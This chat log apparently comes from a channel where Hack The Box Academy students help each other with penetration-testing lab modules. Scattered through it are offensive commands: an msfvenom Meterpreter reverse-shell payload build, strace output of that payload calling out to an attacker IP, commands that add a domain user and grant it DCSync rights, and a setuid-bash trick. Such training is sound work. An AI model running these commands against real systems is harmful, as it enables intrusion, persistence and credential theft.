#modules

I was curious about this and in my experience "--local-auth" is equivalent to "-d." or "-d ATTCSVC-LINUX". Either will work; you're either specifying a domain or the local host name to indicate how you want to authenticate.

I found one hacktricks article with a comment that suggests --local-auth "indicates to only try 1 time per machine" when password spraying, but I've never see anything elsewhere that's convinced me --local-auth and -d behave differently. I haven't brought myself to dig into the source code yet. :^)

fro some reason crednetials arent there after a command or so

Well julio$ for sure isn't the sharename

Dig around for other tickets then

But that one should be right

Otherwise restart the machine

And try again

Sometimes it's just dumb

It spawns new tickets

make a copy of the ticket.

that fixed 'er for me.

PIVOTING, TUNNELING, AND PORT FORWARDING/ICMP Tunneling with SOCKS. What is the best way to find a version of ptunnel that is compatible with the target box? The link HTB provides is not compatible with the target. This has been a challenge for me lately.

The filename is julio.txt

You goofball

Not flag.txt

Nah the issue is also flag.txt isn't the filename

Hah, I see that now. 🤦‍♂️ 🙂

The respawning tickets was real too tho.

Yeah

That one can be a bit of a pain at times

bump

You'll need to compile it statically

There might also be a releases page that has it

#modules message

statically? like not with sudo ./autogen.sh

I mean the message I linked showed how to edit the autogen file

so i download from the link that htb provides, i delete what's inside autogen.sh, and then paste that snippet of code you provided, and then i run autogen.sh?

Don't delete all of what's inside

Afaik you only need to edit like one line

so replace line 19 with what you provided?

give it a try

That worked! How was I ever supposed to know that was what I needed to do?

What was the error? Something about glib maybe?

that was the last module's problem this one was ./ptunnel-ng: error while loading shared libraries: libcrypto.so.3: cannot open shared object file: No such file or directory

yeah, anytime an error is referencing shared libraries like that. You've either got to provide the library and hope it's compatible, recompile against a matching version on the target, provide the library or statically compile. Roughly, that's how I understand it.

There should be a few options for resolving.

and what's the best way to go about finding a matching version?

Can someone help me, please? I have a question.

OPTIONAL EXERCISES
Transfer Julio's ccache file from LINUX01 to your attack host. Follow the example to use chisel and proxychains to connect via evil-winrm from your attack host to MS01 and DC01. Mark DONE when finished.
(In PASSWORD ATTACKS MODULE, SECTION PASS THE TICKET FROM LINUX)

|| I transferred Julio’s ccache to my machine, set up the chisel server and client for communication, I exported the ccache on my ATTACK machine, and configured the DNS in /etc/hosts. That part, I think I did right, but can someone correct me if I’m wrong?

When I try to use evil-winrm, I get an error saying the ticket is expired:

Evil-WinRM shell v3.5

Warning: Remote path completions are disabled due to Ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

Error: An error of type GSSAPI::GssApiError happened, message is gss_init_sec_context did not return GSS_S_COMPLETE: Unspecified GSS failure. Minor code may provide more information

Ticket expired

Error: Exiting with code 1```
Claro! Aqui está:

I've already tried forcing another ccache to be generated, but the error persists.

Thank you in advance 😄
||

Yeah, I haven't resolved this problem enough to give you clear advice.

Gotcha, well I guess I will lean on you all more for stuff like this until I get more knowledgeable myself.

yes, with this command
echo “IP hidden.fuzzing_fun.htb” | sudo tee -a /etc/hosts
echo “IP fuzzing_fun.htb” | sudo tee -a /etc/hosts

Hey in the attacking joomla section i found the flag using an exploit script to travserse directories but how to cat the flag the script i used from github doesnt Specify any commands to get the flag

To see whats inside the txt file

i'm having issues this morning with target machines freezing up and becoming unresponsive shortly after spawning... it's preventing me from moving forward...

on a side note, is there any way to qualify for cpts without having to go through all the modules? can i just take the skills assessments for each module or ... ?

Try a different region on the first comment. On the second you must complete all the modules to quality for CPTS test (no escaping it that I'm aware of).

@shut vapor alright, I'm almost there, but I'm missing something, i have the ICMP tunnels set up, now i need to rdp in to victor's account, i'm using this command: xfreerdp /u:victor /p:pass@123 /v:172.16.5.19 in my attack box, but it isn't working

You're ahead of me now. I'm not able to help with module-specific questions. ¯_(ツ)_/¯

Using the script you can only list or delete directories, so you need it only view the directories. Think about what is the output of the script and then try to navigate. Hope my answer is not that confusing 😄

oh, i didn't realize that you weren't part of the htb staff, extra thanks for all your help!

This is just me f'cking off at work 😆

No i had got it just needed to think a bit

It's job related, but still.

Well done 🙂

what kind of work do you do? I work in a SOC currently

😅

Is the cdsa a good entery point to get a soc job

I wear many hats. Not in the security industry but I manage our systems & network, etc.

Mind if I DM you sometime to ask how things go at a SOC?

gotcha so i'm sending you tickets all the time regarding "user added/removed to security enable universal group"

no idea, the more hands on the better

Mm i got an ejpt i wanted to take cpts but now thinking maybe soc could open more doors that pentesting for an outsider

However you can get your foot in the door. It most likely is easier to find a SOC job over a pentesting one

Ya ill propably finish the cpts pathway and move to the soc one

And try to take that cert

I feel you, I work as a soc analyst also

Attacking and Enumerating AD - Skill Assessment 1

I get this when I upload ligolo client.exe
Anyone know why?

It does work i solved it using ligolo

I didnt get this

I had the same issue also while using the antak webshell to upload chisel. I just did it through wget

I referd to a video by john Hammond and followed along worked smooth for me

Earlier today I transferred msf rev shell and it worked fine until I had to pivot, then it didn't work, so now I will try with ligolo

Guys I'm in pentester path, shells & payloads, reverse shells. In the text it says that after disabling windows av the reverse shell written here should work but when I remmina into the target machine and I paste the reverse shell (after disabling antivirus and writing the correct ip and port) it just gives me a bunch of errors. I have nc -lv 443 open on my attackbox. Just to understand am I supposed to find another way to get a reverse shell or is there something weird with the machine? I already respawned the target
Target is windows 10, attackbox is Kali linux

Well I didn't need a reverse shell to solve the box but I still don't understand if it's how it's supposed to be

was anything returned after you disabled av? you did that with a powershell command, yeah?

Yes with Powershell, no errors given

and when you run the reverse shell command - are you doing that in powershell? if so, you don't need to run 'powershell' at the start of the command

Yes I tried that but the first error says -nop is not recognized

Are you doing that room too?

yeah that's arguments for 'powershell'. get rid of all that, just use what's between the ""s

i did it recently

if you run from a command line, you'll use powershell -nop etc. from within powershell, just execute the actual powershell commands themselves

Thx it worked

Damn this chat is efficient af

👍

haha yw

Are you including the port when trying to curl or visit it?

Are you putting the port in the hosts file, if so-- don't do that

in hosts file NO

make sure to put wordliost.txt:FUZZ as well.

Then my original question are you specifying the port when fuzzing

That's not required

It's the default behavior of single wordlists

no kidding?

Yes

only required for multiple lists? i see it all too oftne

Yeah

To differentiate the uses for lists

must be force of habit so its not forgetten when a fuzz comes with multiple lists? ill have to remember that

I.e. uid.list:UFUZZ directory.list:DFUZZ...

Or whatever word you like really

thank you, I will check all what you write, and write you feedback

Always specify the port

Just because you got a domain doesn't mean the port magically changed

I'm at pentester path, shells and payloads, I don't know any powershell, does this path teach me or am I supposed to know it already?

Because under "introduction to payloads" it breaks down a very long powershell payload and it's like mandarin to me

you should know some basic PowerShell after completing Intro to Windows Command Line

that should be good enough

Im doing everything as specified but still facing this issue : C:\Windows\system32>move security.save \10.10.15.157\CompData
The system cannot find the file specified.
Password Attacks - Attacking SAM
Module

So, first mistake in document hosts i made " quotes", then I don't know why but feroxbuster, in my situation worked better than ffuf, and I dont know why but curl also didn't work, and I couldn't open page using link (maybe still crooked hands) . So I used feroxbuster in general, ffuf - only one or two times, and after finishing fuzzing forexbuster I will open link.
Thank You @fathom pendant @quiet trout

PIVOTING, TUNNELING, AND PORT FORWARDING/ICMP Tunneling with SOCKS. I'm getting tripped up on the last bit here. I have the ICMP tunnel set up. Now I need to rdp into Victors account, but it's not working.

Did you follow the steps exactly?

There's 3 machines in play here

A --> B and B --> C

Iirc this is the double pivot one

i tried, i don't know what i was doing wrong, but i got the flag with help of gpt. Used this command: ssh -L 3389:172.16.5.19:3389 ubuntu@WEB01

Oh wait I might be thinking of the wrong section

They all blend together tbh

Anyone to give a nudge on the Whitebox Pentesting 101 - SA?
I'm able to control the function and ping different hosts than myself, but any payload I try doesn't get executed.
I'm trying a single command injection with after the usual JSON data to ping me back so I know it works

Hey im trying to solve attacking drupal section but i cant seem to make any exploit work i went to the exploit db database found the code created a drupalgeddon.py file and try to run it not workinh

hi guys, please i need help in 2nd question on Pivoting, Tunneling, and Port Forwarding , Meterpreter Tunneling & Port Forwarding
can anyone help?

Did you download the py3 one or the py2 one

Py3

I don't recall having issues with that one

i keep getting - Command shell session 3 closed.

Mm totally there are 3 exploits right all 3 work i think

I don't recall

I think some I gave up on bc I couldn't be asked to refactor to python3 even with 2to3

Ohk

Drupalgeddon1, 2 or 3

1 worked

It's been a minute since I've done it tbh

I tried it using msf also but not wrked

Msf has payloads for 1 and 2

¯_(ツ)_/¯

I believe those are adding users yeah?

Mm yes

Admin user is added

I copied the drupal1 exploit from the link in this section that lead to exploitdb

Copied the code creatd a nano file .py and pasted i

I believe you can change the username and password of the user you're adding

Tried to ran but not wrking

I think i made some error while creating the file

Other than that the exploit db payload should have worked right

select * from dbo.accounts
[-] ERROR(WIN-02\SQLEXPRESS): Line 1: Invalid object name 'dbo.accounts'

What database is "accounts" in?

Try sys.dbo.accounts

Also invalid object name

Also just use the table name

Im in the Information Gathering module at the skills assessment. Trying to crawl at all simply fails. My vhost is in /etc/hosts properly, i can connect via the browser, following the same steps as the previous module returns an empty file with no hint at all for what is going wrong. It just returns nothing!!!! can anyone help?

Subdomains of subdomains, if you're looking for the current API key, look for robots

If you can't find an answer, look for subdomains

im currently looking for the api key. I have no subdomains because nothing returns anything so idk what you mean??

Wdym "nothing returns anything"

What's your syntax?

I can almost guarantee I can find where you're going wrong as it might be a common mistake that many people make

Trying to "use master.dbo" returns a syntax error and trying to "use accounts" returns "Database 'accounts' does not exist." Anything else?

First list all databases

Then go from there

Only databases accessible are tempdb and msdb, neither of which mention anything about users.

Well then you might not be the right user to see/access

What module/section again?

ive been at this question for an hour, none of the tools described in the module earlier in the crawling section do anything other than give me empty files. I just did recon spider like:

python3 ReconSpider.py http://inlanefreight.htb:47598/

and every other combination I could think of as a starting url for recon spider and it just gives me a blank results.json. the same thing happens to me with the other tools.

that url works in browser

Well, you need to dig deeper for subdomains

please stop being cryptic, what does that mean????

...

Subdomain fuzzing

Well it wouldn't be in "model" would it? What about "hmaildb"? And definitely not "flagDB" as that's the second question. This is "Attacking Common Services > Attacking SQL Databases".

It's not cryptic at all

??? Dude the hint I provided there was for a skill assessment

The password question relates to stealing the hash

And cracking that with hashcat

"you need to dig deeper" in response to "this specific thing that the module says to do isnt working where before it did", to mean "use an entirely different method from what was shown" is not clear, no

the druppalgeddon3 exploit it's not available

Again, "Attacking Common Services > SQL Databases"

Yes dig deeper as in find a subdomain that will give you what you want

what i want is to understand why reconspider and others just return nothing, tho

Yeah. I'm staring at that page and there's 2 questions, 1 related to the password of the mssqlsvc account, and the other the flag

Because there's nothing for reconspider to crawl

So it's returning nothing

Reconspider doesn't search for subdomains

Yes, and the mssqlsvc account information is nowhere to be found in any of the databases I have access to.

.... steal the hash and crack it

As shown by the module

There's no hash in the database.

Any ideas why john stops ?

🤦

Read the section again

It refers to using responder

And a built in mssql command

Any help with attacking drupal section

Because it ran through the list and didn't find the password

In 1 second ?

Yes

Password attacks yeah?

yes

Use the mutated list

:)

That list again haha

Told you it comes back around a lot in that module

Thanks brother

So do the passwords you previously found

Saw that, told me to ssh to kira, didnt even remember who kira was had to find the pass again

Yep

hi guys, please i need help in 2nd question on Pivoting, Tunneling, and Port Forwarding , Meterpreter Tunneling & Port Forwarding
can anyone help?

its just closing the session i dont know whats happening

I was wondering if there are yt videos on the modules so I can cover the material in the train

It's asking for the network/mask of the route that's added

As far as the session closing try changing vpn regions

Only t0 modules are able to have videos of them

https://help.hackthebox.com/en/articles/5188925-streaming-writeups-walkthrough-guidelines

Hi Guys. I'm having an issue with one of the questions on the Penetration Testing Process module. I know the answer but it get's refused. Can I ask you guys for a support?

We can't read your mind, what section/question

Oh yea I forgot about the paywall part lol

Well I didn't want to ruin anyone's study but the question is What is the name of the security standard for credit card payments that a company must adhere to? (Answer Format: acronym). I know the answer is ||PCI DSS|| But for some reason it doesn't accept it. Is the answer correct or am I missing some point?

Try a dash between the two

ah so its maybe the vpn region

because i didnt understand i couldnt continue steps is just closing straight

Yup that solved the issue. Thank you man. Omg I'm working on this thing over 10 min

¯_(ツ)_/¯

Thats just meterpreter

Could be the connection isn't stable

It closed a lot when I tried pivoting too

That too

I don't recall sessions closing a lot when doing it ¯_(ツ)_/¯

The other options are a lot more stable and better

@fathom pendant what percentage have you reached on offense defnese fundamental ? 100% each?

Lol no

How much ?

Like 37/6/50 %

Also those bubbles are overall

Not fundamental

And you know that much ? haha

I just know what I read

¯_(ツ)_/¯

So i guess you have complete all up to t2 offense modules?

ubuntu@WEB01:~$ ./backupjob
Segmentation fault (core dumped)

Uh no

what u mean

Segfault is a mem error idk how that happens

yea

run your binary with strace to understand where the segfault comes from

i did msfvenom for linux and i put my lhost ip and port 8080 , then i did scp and transfer to the target then chmod +x and backupjob then run

on multi handler was 0.0.0.0 and port 8080

¯_(ツ)_/¯

I don't think strace is installed on the target boxes

┌──(kali㉿kali)-[~/Desktop]
└─$ strace ./backupjob
execve("./backupjob", ["./backupjob"], 0x7ffe4b94cf00 /* 56 vars */) = -1 EACCES (Permission denied)
strace: exec: Permission denied
+++ exited with 1 +++

ah shit :/

Strace requires sudo

this before transfer

same output

this on target machine

ubuntu@WEB01:~$ strace ./backupjob
execve("./backupjob", ["./backupjob"], 0x7ffe9315a2b0 /* 23 vars */) = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0) = 0x7fc6dab1e000
socket(AF_INET, SOCK_STREAM, IPPROTO_IP) = 3
connect(3, {sa_family=AF_INET, sin_port=htons(8080), sin_addr=inet_addr("10.10.15.125")}, 16) = 0
read(3, "echo Vm8K3O06aZ2\n", 126) = 17
--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x80} ---
+++ killed by SIGSEGV (core dumped) +++
Segmentation fault (core dumped)

Create a new backupjob

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<IPaddressofAttackHost -f elf -o backupjob LPORT=8080
lhost my tun0

be careful exposing your ip address, but first the binary must be executed on the remote machine and not on your kali, and you must launch your listener on your msf.

yea i did use multi/handler and set lhost 0.0.0.0 and rport 8080 then transfer scp

and run

Excuse me, which section is Metasploit?

Make sure you chmod +x it after the transfer

ah no pivoting ok, yes I think you're right and yes try to put the executable bit on your binary on the remote machine.

also payload on msf is set payload linux/x64/meterpreter/reverse_tcp

Everything else shown in the module

Error starting TCP server on port 80, check permissions or other servers running

pwnbox uses port 80 to serve itself to you; but port 80 isn't required for this

Skills Assessment - Using Web Proxies
The third question asks me to encode a cookie with one additional character. I've set up pretty much everything except Hex encoding. It doesn't appear to be in ZAP. And I don't see scripts to select from or to import my own.

Is there any downside to just writing the command line script instead?

as long as the smb server is running you'll be able to yoink the hash

you can use burp instead

Gotta use burp I think

Really slow tho

also

you need to prefix the list with your decoded hash, then re-encode it in the reverse of how you decode it

But I don’t remember waiting too long

Of course. I also suffixed it just in case. But I am surprised ZAP can't resolve this rather simple task.

it probably can

¯_(ツ)_/¯

i just know how to do it in burp not zap

Hah!

Where is the setting to change Responder's default port? There's no -p <port> option.

Zap got like 1 million buttons

it's in the responder config, but as I said there's no need for that for this section

as it only requires SMB to access, if you read the stealing hashes subsection

Can't wait to smash them all. I think my main reason to use it is that it has a cooler name. The second reason is that it is free.

Hey, I'm just a newbie. Can anyone help me with module/144/section/1257 or the Information Gathering - Web Edition/Virtual Hosts section? The answer should provide me with the full subdomain for these prefixes: (web, vm, br, a, su). I created a text file with all of these prefixes, each on a new line. Here's what the command I entered looks like: (gobuster vhost -u http://inlanefreight.htb:38427 -w /home/htb-ac-1460933/Desktop/Pre.txt --append-domain) I also tried (gobuster vhost -u http://94.237.59.63:38427 -w /home/htb-ac-1460933/Desktop/Pre.txt --append-domain) Additionally, I tried adding the following line in the hosts file (94.237.59.63 inlanefreight.htb)

i did i figure it out

where are you getting pre.txt from?

thanks

there should be installed wordlists to use

i create it

also that's not how fuzzing works my guy

it won't just magically expand the subdomain

your wordlist needs to contain the word (subdomain) in the list for it to catch it

using seclists/Discovery/Web-Content/common.txt is a good way to find a bunch (i believe it's under /usr/share or /usr/wordlists)

the module examples should give you a wordlist as well

Yeah, it does provide me with a wordlist, but I decided to create my own because the provided one takes a long time to complete

gotta have patience my guy

not everything is gonna be instant gratification

yeah, true. Thank you so much for ur help i really apreciate it🫡

pentesting isn't as immediate as shows might lead you to believe

Shows show you HTML when they show any code besides timer at all 😄 Stranger things had some flexbox there

most of the time though HTB won't have you waiting more than 30 minutes at most

please avoid spoilers, but also you can't share large blocks of text because your account isn't linked (see #welcome )

if it's something you had to discover: it's a spoiler and you should redact it before sharing

i just sent a piece of what i got after using subdomains-top1million-110000.txt, it worked thanks again

again if it had to be discovered: it's a spoiler, that's all

but the automod treats large blocks of text from unverified/unlinked users as spam

Is there any pre-cursor module or resource anyone knows of to help with the DNS Zone Transfer section of Information Gathering- web edition. I managed to use dig to get an ns record but I just want to fully understand the concept and all other examples online use the digi ninja example. I asked a few days ago and I have read articles and it just isn’t clicking

Appreciate any guidance in this area

why does the dll file disappear from the directory shortly after extracting it in the rdp session? PIVOTING, TUNNELING, AND PORT FORWARDING/RDP and SOCKS Tunneling with SocksOverRDP

Looking for some direction on the Windows Lateral Movement module, specifically in the Windows Remote Management module. I can run commands on DC01 as helen, but not leonvqz. I do have a RDP session on SRV02 as leonvqz but that doesn't seem to help...

https://academy.hackthebox.com/achievement/667914/51

last 3

ahah I also hate so much!!! I’m in privesc linux

https://academy.hackthebox.com/achievement/906219/147

windows privesc it will sting

the latter half of the module is mostly just copy the CVE over and compile to get root

but the skill assessment ties everything you learned together

it's not straight htb-student --> root

you actually gotta dig for lateral then vertical movement :)

that also said you dont need the ssh credentials for the foothold

you can exploit through the weebserver

yeah for an extra challenge

yes did you do that?

¯_(ツ)_/¯

no

didn't really care to

lol

ah for sudo and other? I’m at the biblihoteque python sa va I’m soon at skill assessement

the python library one is easy

i think that part is broken since the wp blog has hyperlinks to static 10.10.10. ip also, the manager password was complex

since you can edit the __init__.py

you can discover the tcat mgr password via grep/cat

the static links being broken means they aren't important to exploit

yeah i did and that was not possible to get from blackbox perspective

there's also a web server on 80

I guess it’s going to be hot the one who gives me shit is logrotate:/

yeah

Hello. Did anyone else have a hard time on the pentesting basics?

yeah it’s not so complicated

aah i figured out the break in

there's a contact form :)

watch ippsec's video he solved on of the boxes(search ippsec.rocks) really very helful to understand the race condition

logrotate isn't that bad tbh

are you talking about the LPE skill assessment?

yes

There's a "Contact US" button :p

ok, will give that a try

i'm gonna move on to WPE now though :P

yeah I plan to watch a lot of these videos once the modules are finished

Thanks, @dapper moth for the bump!

well I had done a chmod u+s/bin/bash so that the cron can run the file as root but the shell remained 10 seconds no more

and it was boring to understand if it was in access.log that you had to put the payload or access.log.1 x)

no need to do all that

also you don't necessarily need a shell

that's what I understood but later lol

access.log.1 is a temporary backup while it's updating

yesss that's right 🙂

:P

just takes a hot second to execute though

Hello,
I finally managed to finish the AD Enumeration & attack skill assessment I module.
Is there only one way to do it? or I can try some others stuff ?
Is there a writeup at the end of the module ?

Btw really great module everything from the beginning to skill assessment is just fucking great...

that was my problem lol sometimes it took 1 minute i didn't understand why ahah

the module itself is the writeup

oh wait wrong one i'm thinking of

no there's no official writeup of AD enum

you can likely find alternate ways to escalate and get DA

but the questions are formulated in a way to guide you there

i'm sure there's some silly exploit that gives you DA in some way or another

¯_(ツ)_/¯

but afaik; there's no way to unintentionally get DA

I have a back-up option if what I was doing didn't work. I will try it then.

HTB is pretty good at not allowing unintended ways in the skill assessments

Yes for sure it's why while doing it without looking at the questions I ended up doing the same thing 😅 It's just that I didn't try everything that I learned in this module such as password spraying.

¯_(ツ)_/¯

I got stuck on that password spray too

Right, so I have Responder running — now why is it not showing anything after I used impacket-mssqlclient to run xp_subdirs?

Didn’t capitalize a letter and then stuck

did you specify your ip/share?

Yes, and still nothing:

are you trying to do both smbserver.py AND responder?

just do one or the other

Oh, never mind, it was smbserver.py I was trying to do — sorry, misspoke.

also

Again, however, it should be showing hashes, but it isn't.

just try with responder first

to be sure it's not just some issue with smbserver

it'll only do the hash if it actually connects

since you're getting the error that it can't do it, then it's not fully connecting

Aha! Got it now; I was using the wrong xp_ command

also you switch from dirtree to subdirs for some reason

¯_(ツ)_/¯

Currently doing the NFS unit in the Footprinting module, and I'm having some trouble with the nmap scripts.

Started happening after I ran --script-updatedb in the FTP unit

The scripts just generally stopped working. Default script scan, service wide scripts, specific scripts, none of them run.

Can anyone help me figure this out? I have a txt file with the most recent NFS scan I ran with debugging turned on if that will help

Hash cracked using John the Ripper but still can't log in as mssqlsvc with it.

Login failed for user 'mssqlsvc' on attempt to mssqlient.py -p 1433 mssqlsvc@<target IP> and type in the cracked password. Why?

Did you tried local auth?

-windows-auth worked, thanks

Hello guys,i want to ask something,so the problem is that i had DACL to every domain user,i tried to add my self DCSYNC rights,but it didnt work.When i gave DCSYNC to a user that didnt even exist net user xor qwerty1! /add /domain
net group "Exchange Windows Permissions" test123 /add
net localgroup "Remote Management Users" test123 /add
$pass = convertto-securestring 'test123' -asplain -force
$cred = new-object system.management.automation.pscredential('htb\test123', $pass)
Add-ObjectACL -PrincipalIdentity xor -Credential $cred -Rights DCSync this worked.when i was doing it for my own account,through my own evil-winrm,it didnt work.Can someone explain me?if this isn't the correct place to ask,tell me

https://academy.hackthebox.com/module/51/section/1640 for second technique there are nothing path available on writable

how to create our own module if anyone has an idea i'm interested

I have succeeded in making the first technical

Modules are generally created by HTB staff directly, or those that we work with. I could DM you an address you could possibly reach out to. Note, that a module requires more than just a technical challenge, but also the content to lead up to it, and a degree of unique learning amongst the existing HTB Academy modules 🙂

You're not able to set the library, so you can move on

ok no problems as they said to practice the 3 technique I wanted to know if it was done expres that the repertoire list is not available in writing but if we have to dig we will do it not the choice ahaha

I tested a lot

It's not possible

ah shit 😦

Oh.. I completely misunderstood the question, didn't I.

Thing is, I don't click random links

So even for setenv that is not available in/etc/sudoers file impossible to do the 3rd technique

ahaha don't worry 🙂

I am on MacOS and a lot of IP's of machines don't load for web enumeration. Is that common for macos? I am using safari or google chrome

Have the machines started? Did you get an ip?
Have you set up the vpn?
Some ips are not meant to be 'browsable'.
Which module are you doing?
Use a Kali or Parrot vm for academy and all other HTB work.

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

Hello everyone, I am working on an exercise of the introduction to assembly language, more directly in the task 2 in the final module, what happens is that I can not find the solution because I get the error Failed to run shellcode”.

Any hints for this question?

Find another valid user on the target GitLab instance.

Attacking common applications

Attacking Gitlab
https://academy.hackthebox.com/module/113/section/1217

I have tried every username list in seclists and havent found the correct user yet.

Anyone here attempt the Secure Coding 101: JavaScript module ? If you did, what did you think of that module?

In the task, I need to take the already working assembly and make a shell code from it(like remove all nuls, vars, and direct address), and make it smaller than 50 bytes, cause attacked server has 50 bytes buffer.

It was nice overall
Forced me to learn JS. Spent a couple of days trying to figure what was happening in the code, but it was nice.

What was it like encountering javascript for the first time? Did you find yourself referring back to the javascript documentation page quite a lot? I have never looked at deobsfuscated js code prior to this module

Me neither.... Spent a couple of days in CodeAcademy learning it

I am stuck on this since 2 days. Tried with mut_password, rockyou, fasttrack. Nothing works...
checked for hint on forum, google, youtube etc. No success.
Can somebody please guide me?
Thanks.

link the module

Javascript or how to decode obfuscated javascript code?

Password attacks
Passwd, Shadow & Opasswd
Examine the target using the credentials from the user Will and find out the password of the "root" user. Then, submit the password as the answer.

JS
Deobfuscation was trailing along the module

Yes I did that module as well. Both difficult

do you have wills password?

yes, the machines are fine.
I am using pwnbox
I am aware, but I researched that some machines for sure are meant to have browzable IP.
I was on Nibbles machine

Did you finish this?
@balmy tartan

I am able to open the web pages on the firefox via pwnbox. Safari on macos doesn't read them. I guess I will have to deal with the VPN delay

Stay away from MacOS lol. Adds an extra layer of troubleshooting.

Yes, I noticed.
Unfortunately that's my OS, I am a musician and use logic Pro. I will probably just invest in a cheaper linux machine

thank you overall though. The firefox works via pwnbox.

Yes, I was able to unshadow.
I don't know this is strange, I created a new directory and unzipped the Password attack resources, mutated the password file again and re-ran hashcat and it worked.

Thanks @gusty cloak

yeah the password attacks module is the worst module on earth

Yeah I still have half left. i hope second half is better.

its not... lol

are you using the gitlab enum script? also i used the seclists users.txt

password attacks isn't even that bad

if you're an impatient person, sure it's a bitch

but it's a sublesson in patience

both python and bash script yes

i just love waiting 2 hours for a wordlist only to find out the password wasnt in that list

i mean

the general flow is: use provided resources --> then rockyou (when dealing with passwords)

if it's taking > 20-30 minutes, assume the wrong list

other things that would be learned in that module: save found/pillaged credentials

you never know when they may pop up again

or like the module im doing now and ive used every username list known to man and havent found anything

and the same list others say worked

did you use the cirt list?

yes on both my machine and attackbox, reset machine as well

both python and bash

i also suggest piping to grep

| grep exists

i did that too for bash script since the output is awful

dude

now ay

you found the other account

bro

BRO

you saw nothing

it happens

https://tenor.com/view/men-in-black-illusion-magic-gif-20305089

i dont know how i didnt try all caps

https://tenor.com/view/it-was-me-barry-original-flash-reverse-flash-gif-16579891338034607240

cant believe it

Im doing the BBH -> File Upload Attacks -> Absent Validation section

https://academy.hackthebox.com/module/136/section/1260

and we're ulpoading a trivial php file to return a hostname, thats understood.

what i am curious about is how you're to identify where a server stores uploaded files in the wild... its not explained in the module and i've ran into this issue on boxes before.

It's covered later in the module

a simple example would be if you upload a profile pic, you may be able to right click on the profile pic and open in new tab revealing the location, or by reviewing the source code. an advanced way is covered later though like i said.

as said; source code review, inspect element, plenty of ways that reveal how it's shown

Hello have you encountered this how could I get around it or make it work

1: you don't need to run around your system as root, that's a bad habit
2: are you connected to the VPN; the error states that it couldn't connect

oh still can't get through, yes connected to vpn and can ping the host

you'd get better help if you provided what module/section you're on. is smb even enabled on that target?

Oh i am at this module Attacking Common Services (SMB)

you should delete the pic as it shows answers to the module

i'd reboot the target, it works for me

i also used cme, not nxc, although that shouldn't matter

oh alright thank you 🙂 will try it again

sorry ><

Got the flag for RDP and SOCKS Tunneling with SocksOverRDP! What a fun, crazy, laggy ride that was!

i had to type that flag in 😭

today is the day i complete nibbles, mark my words

i mean

the module itself guides you through it

Did 0 progress today

Those days happen

¯_(ツ)_/¯

Just took a peak at Introduction to Active Directory Enumeration & Attacks and man this one is going to be a journey in itself.

yeah

definitely pase yourself through it

iirc that one is marked as like several days

ok so on Getting Started --> Nibbles - Privilege Escalation, I'm trying to execute monitor.sh and I'm getting

sudo: no tty present and no askpass program specified

what does this mean, and how can I fix it?

it generally means you didn't upgrade your shell

via python3 -c "import pty;pty.spawn('/bin/sh')"

however you shouldn't need a password

when sudo gives you a full filepath to use with nopasswd; you use the full filepath

i did this, it said

/bin/sh: 10: Syntax error: word unexpected (expecting ")")

which makes no sense because there's no syntax error 😭

fixed

try the new one

but also i believe the module teaches you how

i followed the module, but im still encountering errors 💔 i know it's something i'm doing wrong, i'm just not sure what

if /bin/sh doesn't do it, try /bin/bash

either one of those should result in a pseudo-terminal (pty) shell

it didn't give me an error, so.. good sign?

yes good sign, i got to the part where it asks for nibbler's password

what is the sudo password for nibbler 😭 is that the one we pick ourselves? if so, im so cooked

Likely you need to use some knowledge taught earlier in the module - you wouldn't have just been provided with a password

You're logged in as nibbles right.. what can nibbles do..

Read back over the Privilege Escalation section 🙂

i redid the command i got the same sudo no tty present

can you help me with the last part of the module of introduction to the ensablador language? i am in the task 2 of this module. :c

slight translation mishap but ik you mean assembly

but it helps others help you if you can say what you tried instead of just saying what task you're on

also the section name is helpful

think of the Module name as the Book and Section name as the chapter

both found at the top of the page

i tried both, it still asks for a password even though the module implies there should be no password necessary

Are you specifying the full filepath after unzipping and modifying the file?

how would that change the outcome?

im in the same folder as the monitor.sh

Sudo permissions are very literal in what it says you can do

so i just do

sudo monitor.sh

If it specifies a full filepath then only that full filepath will do it

same outcome, it still asks for a password

So as to prevent you creating a rogue program named the same, and launching it with sudo perms

Reset the box. Start from square one and follow the instructions slowly

yessir

If you're using a kali box instead of pwnbox/parrot you'll have to put the fg on the same line as the stty -echo line with a ; in between them

sorry my English is not very good, it is in intro to assembly language in the part of skill assessment - TASK 2

Task 2.
We are performing a pentest, and in a binary exploitation exercise, we get to the point where we have to run our shellcode. However, we only have a buffer space of 50 bytes. Therefore, we have to optimize our assembly code to be shellcode-ready and under 50 bytes to successfully run it on the vulnerable server.

The server above simulates a vulnerable server on which we can run our shellcodes. Optimize 'flag.s' for shellcode and get it under 50 bytes, then send the shellcode to get the flag (feel free to find/create a custom shellcode).

I have modified the code given to me, so that it is smaller than 50 bytes.

I generate a shellcode in hexadecimal, but when I send it with the nc command to the ip and port to get the flag, it sends me fail shellcode.

did that, same problem

i have to go, i'll look at this later. thank you for your help

That's a Tier 2 module, please ask your question without showing potential spoilers.

went ahead and deleted since the password might be able to be inferred from the last guess given

the username is given by the question, however

Anyone else have a terrible time doing the "Exploiting Web Vulnerabilities in Thick-Client Applications"?

just a random insane rated machine in the middle of this module

coldest take in all of htb-academy

it is not fun ™️

there's a reason that people suggest to use the 'fatty' writeup by ippsec

I finished it but Holy shit i swear everything went wrong every step of the way

the section feels rushed and doesn't properly explain things enough to make you feel like you learned something

I was following 0xdfs walkthrough and even then it was annoying to do

just. pain

I have a feeling the 3 skills assessments combined will be easier than that single part.

and you won't be wrong

assessment 2 is the most satisfying of them all

3 really just sucks

putting 3 first and 2 last would probably be better

going from assessment 2 to 3 was just a rollercoaster

3 isn't necessarily difficult; it's just disappointing

Hey can I shoot you a dm

goodluck and godspeed

For the "Open-Source Software" section in the "Introduction to Windows Evasion Techniques" module, if the ThreatCheck reports on bytes like "FF 25 00 20 40 00" after modifying the GUID of Rubeus, which seems to be universal for all C# executables, how do we proceed from there?

Have you managed to get further from here?

Hi everyone,

